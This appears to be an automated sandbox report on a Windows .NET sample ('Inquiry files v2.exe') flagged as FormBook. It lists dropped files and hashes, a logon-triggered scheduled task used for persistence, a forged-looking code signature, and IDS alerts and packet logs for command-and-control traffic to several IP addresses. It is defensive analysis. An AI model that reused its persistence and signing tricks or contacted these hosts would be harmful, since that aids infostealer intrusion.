                          Entropy (8bit):5.35299682261553
                          Encrypted:false
                          SSDEEP:48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HKHKMRbHKnHKU57Uivj:Pq5qHwCYqh3oPtI6eqzxqqMRbqnqU57n
                          MD5:B0DF99A47CF8612EF42E4C30907F5CAD
                          SHA1:9C53411244A7810D704C743BA3E13DCA77839074
                          SHA-256:97B250764E2328216E67001A7C6B207A74BDD90782669639C6469634DAB5DE58
                          SHA-512:8A9A273E145414FC578426B6BF7D1A52DAF9842FB81C8886D2200674E4ED8CCDADA5A7259A915A1685BAB5BDACDE2DF2DF0E06B105D60D7A7E5B85305C2E7FC7
                          Malicious:true
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WOzeoJQi.exe.log

                          Download File
                          Process:C:\Users\user\AppData\Roaming\WOzeoJQi.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1730
                          Entropy (8bit):5.35299682261553
                          Encrypted:false
                          SSDEEP:48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HKHKMRbHKnHKU57Uivj:Pq5qHwCYqh3oPtI6eqzxqqMRbqnqU57n
                          MD5:B0DF99A47CF8612EF42E4C30907F5CAD
                          SHA1:9C53411244A7810D704C743BA3E13DCA77839074
                          SHA-256:97B250764E2328216E67001A7C6B207A74BDD90782669639C6469634DAB5DE58
                          SHA-512:8A9A273E145414FC578426B6BF7D1A52DAF9842FB81C8886D2200674E4ED8CCDADA5A7259A915A1685BAB5BDACDE2DF2DF0E06B105D60D7A7E5B85305C2E7FC7
                          Malicious:false
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):2232
                          Entropy (8bit):5.380805901110357
                          Encrypted:false
                          SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:lGLHxvCsIfA2KRHmOugw1s
                          MD5:2841736A1E367C6D039C41512DA2893E
                          SHA1:8AE1356D954F14390DD115EB92E2B01F86E98141
                          SHA-256:70D4743FAB5C407020B872595615D3B018AC17A6F504084BF1E95B061C97047E
                          SHA-512:E11A1F186A9B75658F905B7128526E054CEE572A4F55BBB864B5E8B5DC3D8B62D1E160F31472213DB0CEB8A612D71B23DAE03EBC6AB5BC0D8933732F2007EF6C
                          Malicious:false
                          Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                          C:\Users\user\AppData\Local\Temp\023115

                          Download File
                          Process:C:\Windows\SysWOW64\runas.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                          Category:dropped
                          Size (bytes):196608
                          Entropy (8bit):1.1239949490932863
                          Encrypted:false
                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                          MD5:271D5F995996735B01672CF227C81C17
                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                          Malicious:false
                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gqgslst.yvi.ps1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fegevuwu.hjf.ps1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opijrymf.njy.psm1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u2gv1muc.kuy.psm1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\tmp35FF.tmp

                          Download File
                          Process:C:\Users\user\Desktop\Inquiry files v2.exe
                          File Type:XML 1.0 document, ASCII text
                          Category:dropped
                          Size (bytes):1595
                          Entropy (8bit):5.0984017120835095
                          Encrypted:false
                          SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLa/xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTm5v
                          MD5:B9A1E0C4E27119F87CA0FA1C9FD61777
                          SHA1:615DFD9A8BE2C67410213D3E2693B10A1FD92F4E
                          SHA-256:6E41183C577875F7FE89BD1DF0577373513FDD2D11C130395379EF38E1361A20
                          SHA-512:073B373DD3E5C60AD0FF9BC715B7E46446F7758ABEBF0A630A3B5DA092899842F72623FDC2DF84491C8F0594E80440D0B5C5006575B56D4D1F928294865FD884
                          Malicious:true
                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                          C:\Users\user\AppData\Local\Temp\tmp5B3B.tmp

                          Download File
                          Process:C:\Users\user\AppData\Roaming\WOzeoJQi.exe
                          File Type:XML 1.0 document, ASCII text
                          Category:dropped
                          Size (bytes):1595
                          Entropy (8bit):5.0984017120835095
                          Encrypted:false
                          SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLa/xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTm5v
                          MD5:B9A1E0C4E27119F87CA0FA1C9FD61777
                          SHA1:615DFD9A8BE2C67410213D3E2693B10A1FD92F4E
                          SHA-256:6E41183C577875F7FE89BD1DF0577373513FDD2D11C130395379EF38E1361A20
                          SHA-512:073B373DD3E5C60AD0FF9BC715B7E46446F7758ABEBF0A630A3B5DA092899842F72623FDC2DF84491C8F0594E80440D0B5C5006575B56D4D1F928294865FD884
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                          C:\Users\user\AppData\Roaming\WOzeoJQi.exe

                          Download File
                          Process:C:\Users\user\Desktop\Inquiry files v2.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):807432
                          Entropy (8bit):7.898486542785907
                          Encrypted:false
                          SSDEEP:12288:NyPDWx2PQfAHVvkSGEXrpyJ5LMEdzWImMQzxta/yVcDAc2DfDwsFuhb2rI2ADzPD:CawMEvLX1Is6/kEAX7+3rPUc
                          MD5:9C2717586122DB3E57BA56513F66E1B8
                          SHA1:8CBB9FBC61AB2CCBDBED70828FCBAE389F7B2E1F
                          SHA-256:AD233CDCF6CEAB12B375CCDBF782170CB5717A76F8ECD5D7E45F84800F8AD2CC
                          SHA-512:D4C4338E54E692A449D2B4855BFCB3488EEE014E776D3C72FCB88C3C7761086E4CEF722D0394CEA37D37A0A7C10137BF13E79547567F98C8CB1E9AF298CF4FAD
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 66%
                          • Antivirus: Virustotal, Detection: 48%, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p..f..............0......4........... ... ....@.. ....................................@.....................................O.... ...0...............6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc....0... ...2..................@..@.reloc.......`......................@..B........................H...........h...........\j..(............................................0..L.........}.....(%......(&.....(............s'.....((....o).....(*....o+.....(,....*.0............}........(-........(......,5...(............s'.....(.....o).....(.....o+....8s....r...p.{...(/...o0...t{.......(1..........9.....s%........s2...s3...o4......o(...r...po5..........,$..((.....o(...r...po5...s....o6.......o(...r)..po5..........,$..((.....o(...r)..po5...s....o6........o7...(8.......o9...(:...

                          C:\Users\user\AppData\Roaming\WOzeoJQi.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\Inquiry files v2.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.898486542785907
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                          • Win32 Executable (generic) a (10002005/4) 49.93%
                          • Windows Screen Saver (13104/52) 0.07%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:Inquiry files v2.exe
                          File size:807'432 bytes
                          MD5:9c2717586122db3e57ba56513f66e1b8
                          SHA1:8cbb9fbc61ab2ccbdbed70828fcbae389f7b2e1f
                          SHA256:ad233cdcf6ceab12b375ccdbf782170cb5717a76f8ecd5d7e45f84800f8ad2cc
                          SHA512:d4c4338e54e692a449d2b4855bfcb3488eee014e776d3c72fcb88c3c7761086e4cef722d0394cea37d37a0a7c10137bf13e79547567f98c8cb1e9af298cf4fad
                          SSDEEP:12288:NyPDWx2PQfAHVvkSGEXrpyJ5LMEdzWImMQzxta/yVcDAc2DfDwsFuhb2rI2ADzPD:CawMEvLX1Is6/kEAX7+3rPUc
                          TLSH:390512037AE85B44D4B787B5A6B192106FB776871A33C31E1CD920DE0DF13818B66BA7
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p..f..............0......4........... ... ....@.. ....................................@................................

                          File Icon

                          Icon Hash:0f3b5fede1456317

                          Static PE Info

                          General

                          Entrypoint:0x4c05d6
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66948470 [Mon Jul 15 02:07:44 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                          Authenticode Signature

                          Signature Valid:false
                          Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                          Signature Validation Error:The digital signature of the object did not verify
                          Error Number:-2146869232
                          Not Before, Not After
                          • 13/11/2018 01:00:00 09/11/2021 00:59:59
                          Subject Chain
                          • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                          Version:3
                          Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                          Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                          Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                          Serial:7C1118CBBADC95DA3752C46E47A27438

                          Entrypoint Preview

                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xc05840x4f.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc20000x3004.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0xc1c000x3608
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc60000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000xbe5dc0xbe6002c70b7253b8276bb85ae318c8f2dcd31False0.9194409676625082COM executable for DOS7.906017390992127IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0xc20000x30040x3200f06c31e41e162ea237d4f53355b870a7False0.8790625data7.531946676671177IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0xc60000xc0x2008467afd35ea42e763f9be197f5d74569False0.041015625data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0xc21000x292fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9864364981504316
                          RT_GROUP_ICON0xc4a400x14data1.05
                          RT_VERSION0xc4a640x3a0data0.41810344827586204
                          RT_MANIFEST0xc4e140x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                          Imports

                          DLLImport
                          mscoree.dll_CorExeMain

                          Network Behavior

                          Snort IDS Alerts

                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          07/18/24-07:58:39.821867TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973580192.168.2.613.248.169.48
                          07/18/24-07:57:57.118083TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972680192.168.2.6185.179.189.181
                          07/18/24-07:58:26.022749TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973180192.168.2.6172.96.191.69

                          Suricata IDS Alerts

                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                          2024-07-18T07:58:49.249317+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34973780192.168.2.6162.159.134.42
                          2024-07-18T07:58:24.375289+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34973080192.168.2.6172.96.191.69
                          2024-07-18T07:58:35.096685+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34973380192.168.2.613.248.169.48
                          2024-07-18T07:58:21.770675+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34972980192.168.2.6172.96.191.69
                          2024-07-18T07:58:26.978010+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54973180192.168.2.6172.96.191.69
                          2024-07-18T07:58:32.533421+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34973280192.168.2.613.248.169.48
                          2024-07-18T07:58:40.282074+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54973580192.168.2.613.248.169.48
                          2024-07-18T07:58:37.683924+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34973480192.168.2.613.248.169.48
                          2024-07-18T07:57:57.804335+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24972680192.168.2.6185.179.189.181
                          2024-07-18T07:58:46.875735+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34973680192.168.2.6162.159.134.42
                          2024-07-18T07:58:26.978010+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24973180192.168.2.6172.96.191.69
                          2024-07-18T07:58:19.096164+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34972780192.168.2.6172.96.191.69
                          2024-07-18T07:58:40.282074+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24973580192.168.2.613.248.169.48
                          2024-07-18T07:57:57.804335+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54972680192.168.2.6185.179.189.181
                          2024-07-18T07:58:51.685646+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34973880192.168.2.6162.159.134.42

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jul 18, 2024 07:57:57.090712070 CEST4972680192.168.2.6185.179.189.181
                          Jul 18, 2024 07:57:57.096834898 CEST8049726185.179.189.181192.168.2.6
                          Jul 18, 2024 07:57:57.096906900 CEST4972680192.168.2.6185.179.189.181
                          Jul 18, 2024 07:57:57.118083000 CEST4972680192.168.2.6185.179.189.181
                          Jul 18, 2024 07:57:57.123018026 CEST8049726185.179.189.181192.168.2.6
                          Jul 18, 2024 07:57:57.804214001 CEST8049726185.179.189.181192.168.2.6
                          Jul 18, 2024 07:57:57.804285049 CEST8049726185.179.189.181192.168.2.6
                          Jul 18, 2024 07:57:57.804322958 CEST8049726185.179.189.181192.168.2.6
                          Jul 18, 2024 07:57:57.804335117 CEST4972680192.168.2.6185.179.189.181
                          Jul 18, 2024 07:57:57.805236101 CEST8049726185.179.189.181192.168.2.6
                          Jul 18, 2024 07:57:57.805274010 CEST8049726185.179.189.181192.168.2.6
                          Jul 18, 2024 07:57:57.805344105 CEST4972680192.168.2.6185.179.189.181
                          Jul 18, 2024 07:57:57.806301117 CEST8049726185.179.189.181192.168.2.6
                          Jul 18, 2024 07:57:57.806314945 CEST8049726185.179.189.181192.168.2.6
                          Jul 18, 2024 07:57:57.806349993 CEST8049726185.179.189.181192.168.2.6
                          Jul 18, 2024 07:57:57.806354046 CEST4972680192.168.2.6185.179.189.181
                          Jul 18, 2024 07:57:57.806385994 CEST8049726185.179.189.181192.168.2.6
                          Jul 18, 2024 07:57:57.806416035 CEST4972680192.168.2.6185.179.189.181
                          Jul 18, 2024 07:57:57.806435108 CEST4972680192.168.2.6185.179.189.181
                          Jul 18, 2024 07:57:57.823163986 CEST4972680192.168.2.6185.179.189.181
                          Jul 18, 2024 07:57:57.828321934 CEST8049726185.179.189.181192.168.2.6
                          Jul 18, 2024 07:58:18.177882910 CEST4972780192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:18.182952881 CEST8049727172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:18.183032036 CEST4972780192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:18.202198982 CEST4972780192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:18.207575083 CEST8049727172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:19.095880032 CEST8049727172.96.191.69192.168.2.6
